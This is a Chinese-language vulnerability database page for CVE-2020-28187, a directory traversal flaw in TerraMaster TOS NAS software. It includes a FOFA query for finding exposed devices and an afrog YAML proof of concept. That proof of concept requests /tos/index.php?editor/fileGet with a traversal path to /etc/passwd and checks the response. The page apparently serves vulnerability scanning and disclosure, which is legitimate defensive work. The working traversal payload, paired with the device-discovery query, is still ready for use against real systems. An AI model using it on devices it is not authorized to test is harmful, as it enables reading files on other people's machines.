CVE-2020-28187: TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187

日期: 2025-09-01 | 影响软件: TerraMaster TOS | POC: 已公开

漏洞描述

TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数，读取文件系统中的任何文件。 TerraMaster TOS < 4.2.06 FOFA: "TerraMaster" && header="TOS"

PoC代码[已公开]

id: CVE-2020-28187

info:
    name: TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187
    author: PeiQi
    severity: critical
    description: |
        TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数，读取文件系统中的任何文件。
        TerraMaster TOS < 4.2.06 FOFA: "TerraMaster" && header="TOS"
    reference:
        - https://nvd.nist.gov/vuln/detail/CVE-2020-28187
        - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/TerraMaster/TerraMaster%20TOS%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2020-28187.md

rules:
    r0:
        request:
            method: GET
            path: /tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
        expression: |
          response.status == 200 && response.body.bcontains(b'"code":true') && response.body.bcontains(b'../../../../../../etc/passwd')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-28187.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2020-15568: TerraMaster TOS v4.1.24 RCE POC

CVE-2020-28185: TerraMaster TOS 用户枚举漏洞 POC

CVE-2022-24990: TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990 POC

CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC